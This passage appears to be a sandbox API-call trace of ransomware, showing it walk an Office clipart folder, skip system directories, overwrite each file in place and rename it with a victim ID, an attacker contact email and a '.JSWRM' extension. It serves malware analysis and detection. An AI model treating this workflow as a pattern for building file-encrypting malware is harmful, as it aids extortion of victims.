[0087.871] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa500, lpOverlapped=0x0) returned 1 [0087.875] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.875] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa500, lpOverlapped=0x0) returned 1 [0087.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.876] CloseHandle (hObject=0x314) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0087.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0087.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.877] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.877] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0211981.WMF", cAlternateFileName="")) returned 1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2=".") returned 1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2="..") returned 1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2="...") returned 1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2="windows") returned -1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2="recovery") returned -1 [0087.877] lstrcmpiW (lpString1="J0211981.WMF", lpString2="perflogs") returned -1 [0087.878] lstrcmpiW (lpString1="J0211981.WMF", lpString2="documents and settings") returned 1 [0087.878] lstrcmpiW (lpString1="J0211981.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.878] lstrcmpiW (lpString1="J0211981.WMF", lpString2="system volume information") returned -1 [0087.878] lstrcmpiW (lpString1="J0211981.WMF", lpString2="msocache") returned -1 [0087.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0211981.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0211981.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0211981.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0211981.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0211981.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0211981.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.878] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28276) returned 1 [0087.878] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e70) returned 0x24d210 [0087.879] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6e70, lpOverlapped=0x0) returned 1 [0087.897] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.897] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6e70, lpOverlapped=0x0) returned 1 [0087.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.898] CloseHandle (hObject=0x314) returned 1 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0087.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0087.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0087.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0087.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0087.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.899] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x180e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0212299.WMF", cAlternateFileName="")) returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2=".") returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="..") returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="...") returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="windows") returned -1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="recovery") returned -1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="perflogs") returned -1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="documents and settings") returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="system volume information") returned -1 [0087.899] lstrcmpiW (lpString1="J0212299.WMF", lpString2="msocache") returned -1 [0087.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212299.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212299.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212299.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0087.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212299.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212299.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212299.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0087.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.900] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6158) returned 1 [0087.900] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1800) returned 0x205850 [0087.901] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1800, lpOverlapped=0x0) returned 1 [0087.905] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.905] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1800, lpOverlapped=0x0) returned 1 [0087.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.905] CloseHandle (hObject=0x314) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0087.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0087.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0087.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0087.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0087.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.906] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0212601.WMF", cAlternateFileName="")) returned 1 [0087.906] lstrcmpiW (lpString1="J0212601.WMF", lpString2=".") returned 1 [0087.906] lstrcmpiW (lpString1="J0212601.WMF", lpString2="..") returned 1 [0087.906] lstrcmpiW (lpString1="J0212601.WMF", lpString2="...") returned 1 [0087.906] lstrcmpiW (lpString1="J0212601.WMF", lpString2="windows") returned -1 [0087.906] lstrcmpiW (lpString1="J0212601.WMF", lpString2="recovery") returned -1 [0087.907] lstrcmpiW (lpString1="J0212601.WMF", lpString2="perflogs") returned -1 [0087.907] lstrcmpiW (lpString1="J0212601.WMF", lpString2="documents and settings") returned 1 [0087.907] lstrcmpiW (lpString1="J0212601.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.907] lstrcmpiW (lpString1="J0212601.WMF", lpString2="system volume information") returned -1 [0087.907] lstrcmpiW (lpString1="J0212601.WMF", lpString2="msocache") returned -1 [0087.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212601.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212601.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212601.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212601.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0212601.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0212601.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.907] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9676) returned 1 [0087.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25c0) returned 0x24d210 [0087.908] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x25c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x25c0, lpOverlapped=0x0) returned 1 [0087.910] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.910] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x25c0, lpOverlapped=0x0) returned 1 [0087.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.910] CloseHandle (hObject=0x314) returned 1 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0087.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 